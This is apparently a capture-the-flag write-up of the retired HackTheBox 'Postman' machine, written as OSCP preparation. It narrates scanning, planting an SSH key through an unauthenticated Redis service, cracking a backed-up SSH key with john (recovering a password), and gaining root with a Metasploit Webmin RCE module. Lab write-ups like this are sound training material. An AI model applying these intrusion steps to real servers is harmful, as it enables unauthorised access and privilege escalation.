OSCP PREPROTİONS – HTB Postman

The Postman machine is a machine with a Retired Linux operating system.
The services running on the target machine are checked


Classic Scan

Full TCP Scan

Full UDP Scan

In Full Port scanning, we see that the Redis service is running and 10000 ports are running, then we detail it.

(Redis: -Remote Dictionary Service- It is a NoSQL database designed with Key value. Since the data is kept in memory, it can read and write very fast. Nosql databases are generally used in web services with high data volume)
First, we check the web service running on port 80. We are examining the source codes, but we could not get detailed information.

After we can’t find information on the website, we perform an index scan.

As a result of the scan, we could not obtain detailed information.
We focus on webmin services running on 1000th port and redis services running on 6379th port, which are not available in classical scan but in detailedscan.
We are heading to 10000 ports and erorr comes up and redirects to postnaman. Here I provide postman redirect in etc/hosts

Webmain will be able to login

Default passwords were tried with no results. Performed index scans with Gobuster, no valuable information.
Focused on the Redis side. Connected to target machine with redis-cli.

A Google search was made to see what can be done by Redis peentest. The address https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis was tried first, but php reverseshell was tried but failed.

In Hacktrick pentest, it is recommended to try to login via ssh.
First, it is requested to create ssh file with ssh-keygen

We created our ssh file for it to work
Chmod 600 id_rsa
Then we put two lines at the end and the beginning of this file and scrolled it.

Added ssh creation DB given in hacktrik
Then we ssh

We are allowed to ssh
We are not allowed to read userflag.

Let’s run the linpeas.sh script for Privilege escalation
First, I transferred to the target machine on my own machine.

We ran linpeas.sh

After the general scan is finished, the id_rsa.bak file draws our attention.

We break this ssh key with john.

With the obtained computer2008 password, we log in to the Matt user and obtain our user flag.

Now when we want to go to the root folder, we get permission denied error. Our step this time is to set root access to root flag.
We are running an enumuration again so that we can see the authority escalation method inside

I couldn’t get any results regarding Privilege escalation.
I decided to investigate on the metasploit side
I searched for vulnerabilities on webmin side;

Here, I selected the webmin_package_updates_rce vulnerability and listed the requests with the Show options command. After typing the prompts with the set command, I ran it.

Then I can run the exploit, I’m rooted. Then I got root lafi.